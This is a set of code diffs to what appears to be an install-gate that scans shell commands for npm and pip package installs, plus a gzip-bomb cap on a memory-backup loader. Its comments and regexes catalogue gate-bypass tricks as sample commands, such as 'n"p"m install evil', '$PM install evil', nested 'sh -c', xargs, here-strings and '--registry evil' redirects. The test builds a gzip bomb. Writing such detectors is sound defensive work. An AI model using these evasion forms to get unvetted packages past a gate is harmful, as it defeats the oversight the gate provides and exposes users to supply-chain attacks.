-        t[1] === "-m" &&
-        t[2] === "pip" &&
-        /^(install|wheel|download)$/.test(t[3] ?? "")
-      )
-        return 4;
-      return -1;
-    },
+    argStart: pipInstallerArgStart,
   },
   // python fetch-and-run tools: `uvx <pkg>`, `uv tool run <pkg>`, `pipx run <pkg>`. (RUNNER)
   {
@@ -385,6 +436,16 @@ const MATCHERS: Matcher[] = [
       if (t[0] === "pipx" && t[1] === "run") return 2;
       return -1;
     },
+  },
+  // `uv run --with <pkg> script`: the positional is a LOCAL script/command, only `--with`
+  // fetches a package. Gate only the `--with` package(s); a plain `uv run script` is not an
+  // install. (pkgFlagOnly)
+  {
+    scheme: "pip",
+    toName: pipName,
+    single: true,
+    pkgFlagOnly: true,
+    argStart: (t) => (t[0] === "uv" && t[1] === "run" ? 2 : -1),
   },
 ];
 
@@ -430,11 +491,16 @@ function compactPositionals(tokens: string[]): string[] {
   for (let i = 0; i < tokens.length; i++) {
     const tok = tokens[i];
     if (tok.startsWith("#")) break;
-    if (tok === "-m" && pos.length === 1 && /^python3?$/.test(pos[0])) {
-      pos.push(tok); // structural: python -m pip
+    // Structural `-m` in `python -m pip` — also the glued `-mpip` / `-m=pip` forms, which a
+    // strict `tok === "-m"` dropped as an ordinary flag (defeating pip detection). Expand
+    // to the `-m <module>` positional shape so the pip matcher's fixed indices line up.
+    if (pos.length === 1 && /^python3?$/.test(pos[0]) && /^-m(=?.+)?$/.test(tok)) {
+      pos.push("-m");
+      const glued = tok.match(/^-m=?(.+)$/);
+      if (glued) pos.push(glued[1]);
       continue;
     }
-    if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok)) {
+    if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok) || VALUE_PKG_FLAG_RE.test(tok)) {
       i++; // skip the flag AND its value token
       continue;
     }
@@ -442,6 +508,86 @@ function compactPositionals(tokens: string[]): string[] {
     pos.push(tok);
   }
   return pos;
+}
+
+/** Install/runner verbs — used to fail-close a command run through an unresolvable
+ *  binary indirection (`$PM install evil`), where we can't verify what actually runs. */
+const INDIRECT_VERB_RE =
+  /^(install|install-test|it|i|add|create|init|exec|dlx|x|run|wheel|download|update|upgrade|global)$/;
+
+/**
+ * Fail-closed on an install run through an unresolvable indirection: `$PM install evil`,
+ * `${X} add evil`, `$(which npm) i evil`, `` `which npm` i evil ``. argv0 isn't a
+ * statically-known binary (a bare variable, or a command substitution) and some token is
+ * an install/runner verb — we can't verify what actually runs → block. A var-PREFIXED
+ * real path like `$HOME/bin/tool` is NOT dynamic (it has a path), so no false positive.
+ */
+function indirectInstall(tokens: string[], probe: InstallProbe): boolean {
+  const dynamicBin =
+    /^\$\{?\w+\}?$/.test(tokens[0]) || tokens[0].startsWith("$(") || tokens[0].startsWith("`");
+  if (!dynamicBin || !tokens.slice(1).some((t) => INDIRECT_VERB_RE.test(binBase(t)))) return false;
+  probe.isInstall = true;
+  probe.unverifiable.push(`indirect-bin:${tokens[0]}`);
+  return true;
+}
+
+/**
+ * The packages a matched invocation actually FETCHES.
+ *  - pkgFlagOnly (uv run): the positional is a LOCAL script — only `--with` fetches.
+ *  - other runners: primary = replace-flags (`-p`/`--package`/`--spec`/`--from`) if present
+ *    else the first positional, PLUS every `--with` (an extra fetched package).
+ *  - installer: every positional is a package.
+ */
+function resolveTargets(m: Matcher, args: string[], tokens: string[]): string[] {
+  if (!m.single) return args;
+  const withFlags = withPackageFlags(tokens);
+  if (m.pkgFlagOnly) return withFlags;
+  const replaceFlags = replacePackageFlags(tokens);
+  return [...(replaceFlags.length ? replaceFlags : args.slice(0, 1)), ...withFlags];
+}
+
+/** Apply one matched matcher to `probe`. Returns true when the segment was consumed. */
+function applyMatcher(
+  m: Matcher,
+  pos: string[],
+  tokens: string[],
+  raw: string[],
+  probe: InstallProbe,
+): boolean {
+  const start = m.argStart(pos);
+  if (start < 0) return false;
+  const targets = resolveTargets(m, pos.slice(start), tokens);
+
+  if (targets.length === 0) {
+    // `echo evil | xargs npm i` feeds the package on stdin, leaving zero visible args while
+    // still installing → fail-closed when this segment is an xargs target.
+    if (raw.some((t) => binBase(t) === "xargs")) {
+      probe.isInstall = true;
+      probe.unverifiable.push("xargs-stdin-install");
+      return true;
+    }
+    // A bare reinstall of declared deps (`npm i`) is benign — UNLESS redirected at an
+    // alternate registry/index (`npm i --registry evil`): the tarballs pulled are then
+    // attacker-controlled even with no named package → block.
+    const bareRedirect = sourceRedirect(raw);
+    if (bareRedirect) {
+      probe.isInstall = true;
+      probe.unverifiable.push(`alt-registry:${bareRedirect}`);
+    }
+    return true; // otherwise: bare reinstall / runner-or-uv-run with no fetched pkg — not an add
+  }
+  probe.isInstall = true;
+  // A registry/index redirect means the triaged NAME isn't what installs → fail-closed
+  // (mark unverifiable) even if every name is reputable.
+  const redirect = sourceRedirect(raw);
+  if (redirect) probe.unverifiable.push(`alt-registry:${redirect}`);
+  for (const arg of targets) {
+    if (isLocalTarget(arg)) continue; // user's own code — nothing to triage
+    const name = m.toName(arg);
+    if (name) probe.refs.push(`${m.scheme}:${name}`);
+    else probe.unverifiable.push(arg); // fail-closed: can't reduce to a ref
+  }
+  return true;
 }
 
 /** Match one shell segment against the package-manager matchers, mutating `probe`. */
@@ -456,60 +602,13 @@ function scanSegment(segment: string, probe: InstallProbe): void {
   if (tokens.length === 0) return;
   tokens[0] = binBase(tokens[0]); // /usr/bin/npm, \npm, ./bin/pnpm → npm/pnpm
 
-  // Fail-closed on an install run through an unresolvable indirection: `$PM install evil`,
-  // `${X} add evil`, `$(which npm) i evil`, `` `which npm` i evil ``. argv0 isn't a
-  // statically-known binary (a bare variable, or a command substitution), and some token
-  // is an install/runner verb — we can't verify what actually runs → block. A var-prefixed
-  // PATH like `$HOME/bin/tool` is NOT treated as dynamic (it has a real path), so no FP.
-  const dynamicBin =
-    /^\$\{?\w+\}?$/.test(tokens[0]) || tokens[0].startsWith("$(") || tokens[0].startsWith("`");
-  if (
-    dynamicBin &&
-    tokens
-      .slice(1)
-      .some((t) => /^(install|i|add|create|init|exec|dlx|x|run|wheel|download)$/.test(binBase(t)))
-  ) {
-    probe.isInstall = true;
-    probe.unverifiable.push(`indirect-bin:${tokens[0]}`);
-    return;
-  }
+  if (indirectInstall(tokens, probe)) return;
 
   const pos = compactPositionals(tokens);
   if (pos.length === 0) return;
 
   for (const m of MATCHERS) {
-    const start = m.argStart(pos);
-    if (start < 0) continue;
-    const args = pos.slice(start); // positionals after the verb (flags already removed)
-    // For a runner, the fetched package can be named by `-p`/`--package`/`--spec`/`--from`
-    // (`npx --package=evil cmd`); then the POSITIONAL is the command to run, not a package.
-    const pkgFlags = m.single ? packageFlagTargets(tokens) : [];
-    if (args.length === 0 && pkgFlags.length === 0) {
-      // `echo evil | xargs npm i` feeds the package on stdin, leaving zero visible args
-      // while still installing. If this segment is an xargs target, fail-closed rather
-      // than treating it as a benign bare reinstall.
-      if (raw.some((t) => binBase(t) === "xargs")) {
-        probe.isInstall = true;
-        probe.unverifiable.push("xargs-stdin-install");
-      }
-      break; // otherwise: bare reinstall of declared deps / runner with no pkg — not an add
-    }
-    probe.isInstall = true;
-    // A registry/index redirect means the triaged NAME isn't what installs →
-    // fail-closed (mark unverifiable) even if every name is reputable.
-    const redirect = sourceRedirect(raw);
-    if (redirect) probe.unverifiable.push(`alt-registry:${redirect}`);
-    // A RUNNER fetches its `-p`/`--package` package(s) if present, else only its FIRST
-    // positional; the rest are that tool's arguments. An INSTALLER treats every positional
-    // as a package.
-    const targets = m.single ? (pkgFlags.length ? pkgFlags : args.slice(0, 1)) : args;
-    for (const arg of targets) {
-      if (isLocalTarget(arg)) continue; // user's own code — nothing to triage
-      const name = m.toName(arg);
-      if (name) probe.refs.push(`${m.scheme}:${name}`);
-      else probe.unverifiable.push(arg); // fail-closed: can't reduce to a ref
-    }
-    break; // one matcher per segment
+    if (applyMatcher(m, pos, tokens, raw, probe)) break; // one matcher per segment
   }
 }
 

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -221,6 +221,20 @@ function stripCommandPrefix(tokens: string[]): string[] {
  * text (bounded, to stay linear-time on hostile input) and gate it like a
  * top-level one. Fail-closed.
  */
+// A quoted body that does NOT stop at a backslash-ESCAPED quote: a `\"` inside a
+// double-quoted arg is a literal quote, not the closer (`sh -c "sh -c \"npm i evil\""`).
+// The two alternatives are mutually exclusive (a char is either a backslash — first alt,
+// consuming it plus the next char — or a non-backslash), so there is no quantifier
+// ambiguity and no catastrophic backtracking. Bounded to stay linear on hostile input.
+const QUOTED_BODY = /(['"])((?:\\[\s\S]|[^\\]){1,2000}?)\1/;
+
+/** Unescape a double-quoted shell body (`\"`→`"`, `\\`→`\`, `\$`→`$`) so an install hidden
+ *  behind escaped quotes is re-scannable after extraction. Single-quoted bodies keep
+ *  backslashes literal (shell semantics), so only unescape when the delimiter was `"`. */
+function pushQuoted(out: string[], quote: string, body: string): void {
+  out.push(quote === '"' ? body.replace(/\\([\s\S])/g, "$1") : body);
+}
+
 function nestedCommands(command: string): string[] {
   const out: string[] = [];
   for (const m of command.matchAll(/\$\(([^()]{1,2000})\)/g)) out.push(m[1]);
@@ -232,21 +246,29 @@ function nestedCommands(command: string): string[] {
   // `-[A-Za-z]*c[A-Za-z]*` matches `-c` glued into a short-flag cluster (`-lc`/`-xc`/`-cl`,
   // the common cron/CI form); `\$?` accepts an ANSI-C/locale `$'…'`/`$"…"` command arg.
   for (const m of command.matchAll(
-    /(?:^|\s)(?:\S*\/)?(?:sh|bash|zsh|dash|ksh|ash|fish)(?:\s+\S+)*?\s+-[A-Za-z]*c[A-Za-z]*\s+\$?(['"])([\s\S]{1,2000}?)\1/g,
+    new RegExp(
+      /(?:^|\s)(?:\S*\/)?(?:sh|bash|zsh|dash|ksh|ash|fish)(?:\s+\S+)*?\s+-[A-Za-z]*c[A-Za-z]*\s+\$?/
+        .source + QUOTED_BODY.source,
+      "g",
+    ),
   )) {
-    out.push(m[2]);
+    pushQuoted(out, m[1], m[2]);
   }
   // `eval '…'` / `xargs "…"` — the QUOTED script arg (the unquoted form is handled
   // by SHELL_KEYWORDS stripping). Recurse so a quoted install can't hide behind eval.
-  for (const m of command.matchAll(/\b(?:eval|xargs)\s+(['"])([\s\S]{1,2000}?)\1/g)) {
-    out.push(m[2]);
+  for (const m of command.matchAll(
+    new RegExp(/\b(?:eval|xargs)\s+/.source + QUOTED_BODY.source, "g"),
+  )) {
+    pushQuoted(out, m[1], m[2]);
   }
   // Process substitution `<(…)` / `>(…)` — the inner command RUNS, so
   // `cat <(npm install evil)` must be gated. The splitter never enters these.
   for (const m of command.matchAll(/[<>]\(([^()]{1,2000})\)/g)) out.push(m[1]);
   // Here-string `<<< "npm i evil"` (quoted or bare word) — the operand is fed to a
   // shell (`bash <<< "npm i evil"`); recurse into it.
-  for (const m of command.matchAll(/<<<\s*(['"])([\s\S]{1,2000}?)\1/g)) out.push(m[2]);
+  for (const m of command.matchAll(new RegExp(/<<<\s*/.source + QUOTED_BODY.source, "g"))) {
+    pushQuoted(out, m[1], m[2]);
+  }
   for (const m of command.matchAll(/<<<\s*([^\s'"][^\n]{0,2000})/g)) out.push(m[1]);
   // `npm|pnpm|yarn|bun exec|dlx|x  -c/--call '<shell string>'` runs the string in a shell
   // (with node_modules/.bin on PATH), so an install inside it really executes — recurse.
@@ -255,9 +277,13 @@ function nestedCommands(command: string): string[] {
   // (`corepack pnpm@9 exec -c …`) — binBase strips the @version for the segment matcher, so
   // this recursion must match it too or the string is neither gated nor re-scanned.
   for (const m of command.matchAll(
-    /(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x)\b[^\n]*?\s(?:--call|-c)(?:=|\s)\s*(['"])([\s\S]{1,2000}?)\1/g,
+    new RegExp(
+      /(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x)\b[^\n]*?\s(?:--call|-c)(?:=|\s)\s*/.source +
+        QUOTED_BODY.source,
+      "g",
+    ),
   )) {
-    out.push(m[2]);
+    pushQuoted(out, m[1], m[2]);
   }
   // A package runner whose FIRST positional is itself a package manager
   // (`npx npm i evil`, `pnpm exec npm i evil`, `corepack pnpm@9 exec yarn add evil`) runs that

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -70,10 +70,30 @@ function isFlag(tok: string): boolean {
   return tok.startsWith("-");
 }
 
-/** Strip one layer of matching surrounding quotes from a token (`'pkg'` → `pkg`). */
-function stripQuotes(tok: string): string {
-  const m = tok.match(/^(['"])([\s\S]*)\1$/);
-  return m ? m[2] : tok;
+/**
+ * Remove quote characters from a token, matching how the shell strips quotes WITHIN a
+ * word — `n"p"m` → `npm`, `i'nstall'` → `install`, `'pkg'` → `pkg`. The old version only
+ * unwrapped quotes around a WHOLE token, so intra-word quoting (`n"p"m install evil`) hid
+ * the binary/subcommand from every matcher — a full gate bypass for any package manager.
+ * A backslash-escaped quote (`\"`) is a literal quote in an unquoted word, so keep it.
+ */
+function dequote(tok: string): string {
+  return tok
+    .replace(/\\(['"])/g, "\x00$1")
+    .replace(/['"]/g, "")
+    .replace(/\x00(['"])/g, "$1");
+}
+
+/**
+ * The command NAME as the shell would resolve it for matching: drop a leading `\`
+ * (the standard alias-bypass, `\npm` runs the real npm) and take the basename
+ * (`/usr/bin/npm`, `./node_modules/.bin/pnpm` → `npm`/`pnpm`). Without this the exact
+ * `t[0] === "npm"` matchers were defeated by any absolute/relative path or `\` escape.
+ */
+function binBase(tok: string): string {
+  const noEsc = tok.replace(/^\\+/, "");
+  const base = noEsc.split("/").pop();
+  return base && base.length > 0 ? base : noEsc;
 }
 
 /**
@@ -83,7 +103,19 @@ function stripQuotes(tok: string): string {
  * A bare `VAR=value npm i evil` would otherwise tokenize to t[0]="VAR=value" and
  * defeat every matcher — a full gate bypass.
  */
-const PREFIX_BINS = new Set(["env", "sudo", "command", "exec", "nice", "time", "nohup"]);
+const PREFIX_BINS = new Set([
+  "env",
+  "sudo",
+  "command",
+  "builtin",
+  "exec",
+  "nice",
+  "time",
+  "nohup",
+  "doas",
+  "setsid",
+  "stdbuf",
+]);
 
 /** Drop leading wrapper bins + `VAR=value` env assignments, returning the real argv. */
 function stripCommandPrefix(tokens: string[]): string[] {
@@ -98,7 +130,10 @@ function stripCommandPrefix(tokens: string[]): string[] {
       i++; // VAR=value env assignment
       continue;
     }
-    if (PREFIX_BINS.has(t)) {
+    // Compare wrapper/keyword membership on the resolved basename, so a path- or
+    // backslash-qualified wrapper (`/usr/bin/sudo`, `\command`) is still stripped.
+    const base = binBase(t);
+    if (PREFIX_BINS.has(base)) {
       i++;
       while (i < tokens.length && tokens[i].startsWith("-")) i++; // skip the wrapper's own flags
       continue;
@@ -139,6 +174,13 @@ function nestedCommands(command: string): string[] {
   for (const m of command.matchAll(/\b(?:eval|xargs)\s+(['"])([\s\S]{1,2000}?)\1/g)) {
     out.push(m[2]);
   }
+  // Process substitution `<(…)` / `>(…)` — the inner command RUNS, so
+  // `cat <(npm install evil)` must be gated. The splitter never enters these.
+  for (const m of command.matchAll(/[<>]\(([^()]{1,2000})\)/g)) out.push(m[1]);
+  // Here-string `<<< "npm i evil"` (quoted or bare word) — the operand is fed to a
+  // shell (`bash <<< "npm i evil"`); recurse into it.
+  for (const m of command.matchAll(/<<<\s*(['"])([\s\S]{1,2000}?)\1/g)) out.push(m[2]);
+  for (const m of command.matchAll(/<<<\s*([^\s'"][^\n]{0,2000})/g)) out.push(m[1]);
   return out;
 }
 
@@ -149,6 +191,18 @@ function nestedCommands(command: string): string[] {
 const SOURCE_ENV_RE =
   /^(npm_config_.*registry|npm_config_userconfig|npm_config_globalconfig|.*_registry|yarn_npm_registry_server|pip_index_url|pip_extra_index_url|pip_config_file|uv_index.*|uv_default_index|bun_config_registry)$/i;
 const SOURCE_FLAG_RE = /^(--registry|--index-url|--index|--extra-index-url|--default-index|-i)$/i;
+// pip flags whose VALUE is a FILE/path, not a registry package — skip the value so
+// `pip install -r requirements.txt` isn't mis-triaged as a package `requirements.txt`
+// (a false positive that blocks a benign install and pushes users off the gate).
+const REQUIREMENT_FLAG_RE = /^(-r|--requirement|-e|--editable|-c|--constraint)$/i;
+
+/** Cut an unquoted trailing `# comment` (one starting a word) before tokenizing, so a
+ *  comment's words aren't triaged as packages / mistaken for a registry redirect. A `#`
+ *  glued inside a token (`https://x#frag`, `pkg#tag`) is NOT a comment and is kept. */
+function stripInlineComment(segment: string): string {
+  const m = segment.match(/(?:^|\s)#/);
+  return m ? segment.slice(0, m.index) : segment;
+}
 const DEFAULT_SOURCE_RE =
   /^https?:\/\/(registry\.npmjs\.org|registry\.yarnpkg\.com|pypi\.org|files\.pythonhosted\.org)(\/|$)/i;
 
@@ -212,11 +266,26 @@ interface Matcher {
   argStart(tokens: string[]): number;
   scheme: "npm" | "pip";
   toName(tok: string): string | null;
+  /** A RUNNER (npx/create/exec/uvx…): only the FIRST non-flag arg is the fetched
+   *  package; the rest are arguments passed to it. Installers gate every arg. */
+  single?: boolean;
+}
+
+/** `npm init foo` / `npm|yarn|pnpm|bun create foo` fetches the `create-foo` initiator
+ *  (scoped: `@s/foo` → `@s/create-foo`, bare `@s` → `@s/create`). Map to that package. */
+function initiatorName(tok: string): string | null {
+  const n = npmName(tok);
+  if (!n) return null;
+  if (n.startsWith("@")) {
+    const [scope, name] = n.slice(1).split("/");
+    return name ? `@${scope}/create-${name}` : `@${scope}/create`;
+  }
+  return `create-${n}`;
 }
 
 /** Recognized package-manager invocations, by leading-token shape. */
 const MATCHERS: Matcher[] = [
-  // npm install|i|add <pkg...>, pnpm add|install, yarn add, bun add
+  // npm install|i|add <pkg...>, pnpm add|install, yarn add, bun add  (INSTALLER: all args)
   {
     scheme: "npm",
     toName: npmName,
@@ -232,19 +301,32 @@ const MATCHERS: Matcher[] = [
     },
   },
   // package runners that fetch + execute immediately (high risk): npx/bunx <pkg>,
-  // npm exec <pkg>, pnpm dlx|exec <pkg>, yarn dlx|exec <pkg>, bun x <pkg>.
+  // npm exec|x <pkg>, pnpm dlx|exec <pkg>, yarn dlx|exec <pkg>, bun x <pkg>.  (RUNNER)
   {
     scheme: "npm",
     toName: npmName,
+    single: true,
     argStart: (t) => {
       if (t[0] === "npx" || t[0] === "bunx") return 1;
-      if (t[0] === "npm" && t[1] === "exec") return 2;
+      if (t[0] === "npm" && (t[1] === "exec" || t[1] === "x")) return 2;
       if ((t[0] === "pnpm" || t[0] === "yarn") && (t[1] === "dlx" || t[1] === "exec")) return 2;
       if (t[0] === "bun" && t[1] === "x") return 2;
       return -1;
     },
   },
-  // pip/pip3 install, pipx install, uv pip install, uv add, python -m pip install
+  // create/init runners: `npm init|create <name>`, `yarn|pnpm|bun create <name>` — these
+  // download and run `create-<name>`, exactly the fetch-and-execute risk npx has. (RUNNER)
+  {
+    scheme: "npm",
+    toName: initiatorName,
+    single: true,
+    argStart: (t) => {
+      if (t[0] === "npm" && /^(init|create)$/.test(t[1] ?? "")) return 2;
+      if ((t[0] === "yarn" || t[0] === "pnpm" || t[0] === "bun") && t[1] === "create") return 2;
+      return -1;
+    },
+  },
+  // pip/pip3 install, pipx install, uv pip install, uv add, uv tool install, python -m pip
   {
     scheme: "pip",
     toName: pipName,
@@ -252,6 +334,7 @@ const MATCHERS: Matcher[] = [
       if ((t[0] === "pip" || t[0] === "pip3" || t[0] === "pipx") && t[1] === "install") return 2;
       if (t[0] === "uv" && t[1] === "pip" && t[2] === "install") return 3;
       if (t[0] === "uv" && t[1] === "add") return 2;
+      if (t[0] === "uv" && t[1] === "tool" && t[2] === "install") return 3;
       if (
         (t[0] === "python" || t[0] === "python3") &&
         t[1] === "-m" &&
@@ -259,6 +342,18 @@ const MATCHERS: Matcher[] = [
         t[3] === "install"
       )
         return 4;
+      return -1;
+    },
+  },
+  // python fetch-and-run tools: `uvx <pkg>`, `uv tool run <pkg>`, `pipx run <pkg>`. (RUNNER)
+  {
+    scheme: "pip",
+    toName: pipName,
+    single: true,
+    argStart: (t) => {
+      if (t[0] === "uvx") return 1;
+      if (t[0] === "uv" && t[1] === "tool" && t[2] === "run") return 3;
+      if (t[0] === "pipx" && t[1] === "run") return 2;
       return -1;
     },
   },
@@ -294,32 +389,64 @@ export function parseInstallCommand(command: string): InstallProbe {
 
 /** Match one shell segment against the package-manager matchers, mutating `probe`. */
 function scanSegment(segment: string, probe: InstallProbe): void {
-  const raw = segment.trim().split(/\s+/).filter(Boolean).map(stripQuotes);
+  const raw = stripInlineComment(segment)
+    .trim()
+    .split(/\s+/)
+    .filter(Boolean)
+    .map(dequote)
+    .filter(Boolean);
   const tokens = stripCommandPrefix(raw);
   if (tokens.length === 0) return;
+  tokens[0] = binBase(tokens[0]); // /usr/bin/npm, \npm, ./bin/pnpm → npm/pnpm
+
+  // Fail-closed on an install run through an unresolvable indirection: `$PM install evil`,
+  // `${X} add evil`. argv0 is a shell variable the static parser can't expand, and the
+  // next token is an install/runner verb — we can't verify what actually runs → block.
+  if (
+    /^\$\{?\w+\}?$/.test(tokens[0]) &&
+    /^(install|i|add|create|init|exec|dlx|x|run)$/.test(tokens[1] ?? "")
+  ) {
+    probe.isInstall = true;
+    probe.unverifiable.push(`indirect-bin:${tokens[0]}`);
+    return;
+  }
+
   for (const m of MATCHERS) {
     const start = m.argStart(tokens);
     if (start < 0) continue;
     // Build the package args, skipping flags AND the VALUE token of a source flag
-    // (`-i URL`, `--registry URL`) so the URL is never mis-read as a package name.
+    // (`-i URL`, `--registry URL`) or a requirement/editable file flag (`-r reqs.txt`),
+    // and stopping at an inline `#` comment token.
     const rest = tokens.slice(start);
     const args: string[] = [];
     for (let i = 0; i < rest.length; i++) {
-      if (SOURCE_FLAG_RE.test(rest[i])) {
-        i++; // also skip its value
+      const tok = rest[i];
+      if (tok.startsWith("#")) break; // inline comment
+      if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok)) {
+        i++; // skip the flag AND its value token
         continue;
       }
-      if (!isFlag(rest[i])) args.push(rest[i]);
+      if (!isFlag(tok)) args.push(tok);
     }
-    // No package args → reinstall of already-declared deps (or a runner with no
-    // pkg). Not an "add"; don't gate.
-    if (args.length === 0) break;
+    if (args.length === 0) {
+      // `echo evil | xargs npm i` feeds the package on stdin, leaving zero visible args
+      // while still installing. If this segment is an xargs target, fail-closed rather
+      // than treating it as a benign bare reinstall.
+      if (raw.some((t) => binBase(t) === "xargs")) {
+        probe.isInstall = true;
+        probe.unverifiable.push("xargs-stdin-install");
+      }
+      break; // otherwise: bare reinstall of declared deps / runner with no pkg — not an add
+    }
     probe.isInstall = true;
     // A registry/index redirect means the triaged NAME isn't what installs →
     // fail-closed (mark unverifiable) even if every name is reputable.
     const redirect = sourceRedirect(raw);
     if (redirect) probe.unverifiable.push(`alt-registry:${redirect}`);
-    for (const arg of args) {
+    // A RUNNER (npx/create/exec/uvx…) fetches only its FIRST arg; the rest are that
+    // tool's arguments. An INSTALLER treats every arg as a package.
+    const targets = m.single ? args.slice(0, 1) : args;
+    for (const arg of targets) {
       if (isLocalTarget(arg)) continue; // user's own code — nothing to triage
       const name = m.toName(arg);
       if (name) probe.refs.push(`${m.scheme}:${name}`);

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -34,7 +34,11 @@ export interface InstallProbe {
 // Command separators. Includes single `&` (job-control background) and `|&` so an
 // install placed AFTER a background/`&` op is still its own segment — `: & npm i
 // evil` and `true |& npm i evil` previously left the install non-leading and unseen.
-const SEGMENT_SPLIT = /\s*(?:&&|\|\||;|\||&|\n)\s*/;
+// NO surrounding `\s*`: padding the separator with `\s*` makes String.split O(N²) on a
+// long whitespace run (each start position greedily consumes the run, fails, backtracks) —
+// a hot-path DoS on a whitespace-padded command. `scanSegment` trims each segment, so the
+// split output is byte-identical without the padding, and matching is linear.
+const SEGMENT_SPLIT = /&&|\|\||;|\||&|\n/;
 
 // Leading shell keywords / grouping tokens that precede a real command without
 // changing it. Stripped like PREFIX_BINS so `then npm i evil` / `{ npm i evil; }` /

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -247,11 +247,23 @@ function nestedCommands(command: string): string[] {
   // `npm|pnpm|yarn|bun exec|dlx|x  -c/--call '<shell string>'` runs the string in a shell
   // (with node_modules/.bin on PATH), so an install inside it really executes — recurse.
   // The runner path itself gates nothing positional here (hasExecCallFlag), so the package
-  // is only seen via this recursion.
+  // is only seen via this recursion. `(?:@\S+)?` allows corepack's version-pinned dispatch
+  // (`corepack pnpm@9 exec -c …`) — binBase strips the @version for the segment matcher, so
+  // this recursion must match it too or the string is neither gated nor re-scanned.
   for (const m of command.matchAll(
-    /(?:npm|pnpm|yarn|bun)\s+(?:exec|dlx|x)\b[^\n]*?\s(?:--call|-c)(?:=|\s)\s*(['"])([\s\S]{1,2000}?)\1/g,
+    /(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x)\b[^\n]*?\s(?:--call|-c)(?:=|\s)\s*(['"])([\s\S]{1,2000}?)\1/g,
   )) {
     out.push(m[2]);
+  }
+  // A package runner whose FIRST positional is itself a package manager
+  // (`npx npm i evil`, `pnpm exec npm i evil`, `corepack pnpm@9 exec yarn add evil`) runs that
+  // manager's install for real, but the runner path would gate only the manager name (npm:npm,
+  // reputable → PASS) and miss the real package. Recurse from the inner manager so its args are
+  // scanned as a command. Contrived but a genuine bypass; fail-closed.
+  for (const m of command.matchAll(
+    /(?:npx|bunx|(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x))\s+((?:npm|pnpm|yarn|bun|pip|pip3|pipx|uv|uvx|python|python3|poetry|pdm)(?:@\S+)?\s[^\n]{1,2000})/g,
+  )) {
+    out.push(m[1]);
   }
   return out;
 }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -125,10 +125,15 @@ function withPackageFlags(rest: string[]): string[] {
  * A backslash-escaped quote (`\"`) is a literal quote in an unquoted word, so keep it.
  */
 function dequote(tok: string): string {
+  // Protect an escaped quote as a NON-quote marker BEFORE stripping unescaped quotes —
+  // the old `\x00$1` kept the quote char, so step 2's quote-strip removed it and step 3's
+  // restore never matched, leaking a bare `\x00` into the token (and into block-reason
+  // strings). The marker carries the quote type so it restores exactly.
   return tok
-    .replace(/\\(['"])/g, "\x00$1")
+    .replace(/\\(['"])/g, (_, q) => (q === '"' ? "\x00D" : "\x00S"))
     .replace(/['"]/g, "")
-    .replace(/\x00(['"])/g, "$1");
+    .replace(/\x00D/g, '"')
+    .replace(/\x00S/g, "'");
 }
 
 /**

--- a/src/memory/backup.test.ts
+++ b/src/memory/backup.test.ts
@@ -13,7 +13,9 @@ import {
   isAsymmetricBackup,
   isEncryptedBackup,
   parseRecipient,
+  maybeGunzip,
 } from "./backup.js";
+import { gzipSync } from "node:zlib";
 
 describe("memory encrypted backup / restore", () => {
   it("roundtrips data; a wrong passphrase fails", () => {
@@ -131,6 +133,19 @@ describe("memory asymmetric (public-key) backup — no passphrase, ephemeral-saf
   it("parseRecipient rejects a malformed public key", () => {
     assert.throws(() => parseRecipient("not-a-key"), /must start with/);
     assert.throws(() => parseRecipient("kitmem-pub-deadbeef"), /X25519 public key/);
+  });
+});
+
+describe("memory backup — gzip-bomb guard (bounded decompression)", () => {
+  it("refuses a blob that decompresses past the cap; passes legit data through", () => {
+    // A tiny gzip that expands to 1 MB of zeros — with a small cap it must be refused
+    // (a V3 public-key blob is near-unauthenticated, so a bomb plaintext is craftable).
+    const bomb = gzipSync(Buffer.alloc(1024 * 1024));
+    assert.throws(() => maybeGunzip(bomb, 4096), /gzip bomb/);
+    // legit small payload round-trips under the default cap
+    assert.equal(maybeGunzip(gzipSync(Buffer.from("hello"))).toString(), "hello");
+    // a non-gzip (pre-compression) blob passes through untouched
+    assert.equal(maybeGunzip(Buffer.from("rawsqlite")).toString(), "rawsqlite");
   });
 });
 

--- a/src/memory/backup.ts
+++ b/src/memory/backup.ts
@@ -58,10 +58,30 @@ function readMemoryDbCompressed(srcPath: string): Buffer {
   return gzipSync(readFileSync(srcPath));
 }
 
+// Hard ceiling on the decompressed size. A V3 (public-key) blob is near-unauthenticated —
+// the recipient public key is meant to be shared, so anyone can craft a VALID blob whose
+// plaintext is a gzip bomb (a few KB → many GB). Without a cap, `kit memory pull` of such a
+// blob exhausts memory on the durable box. 1 GiB is well above a real brain (a large store
+// is ~139 MB uncompressed) while bounding a bomb; an over-limit blob throws a clear error
+// instead of OOMing.
+const MAX_DECOMPRESSED_BYTES = 1024 * 1024 * 1024;
+
 /** Gunzip if the buffer carries the gzip magic (0x1f 0x8b); otherwise return as-is
- *  (a pre-compression blob, whose plaintext is a raw SQLite file). */
-function maybeGunzip(buf: Buffer): Buffer {
-  return buf.length >= 2 && buf[0] === 0x1f && buf[1] === 0x8b ? gunzipSync(buf) : buf;
+ *  (a pre-compression blob, whose plaintext is a raw SQLite file). Bounded output so a
+ *  crafted blob can't decompress into a memory-exhausting gzip bomb. `maxBytes` is a test
+ *  seam; production callers use the default 1 GiB ceiling. */
+export function maybeGunzip(buf: Buffer, maxBytes: number = MAX_DECOMPRESSED_BYTES): Buffer {
+  if (!(buf.length >= 2 && buf[0] === 0x1f && buf[1] === 0x8b)) return buf;
+  try {
+    return gunzipSync(buf, { maxOutputLength: maxBytes });
+  } catch (e) {
+    if (e instanceof RangeError) {
+      throw new Error(
+        `backup decompresses beyond the ${Math.round(maxBytes / (1024 * 1024))} MB limit — refusing (possible gzip bomb)`,
+      );
+    }
+    throw e;
+  }
 }
 
 const MIN_PASSPHRASE_LEN = 12;

--- a/src/policy-doc.ts
+++ b/src/policy-doc.ts
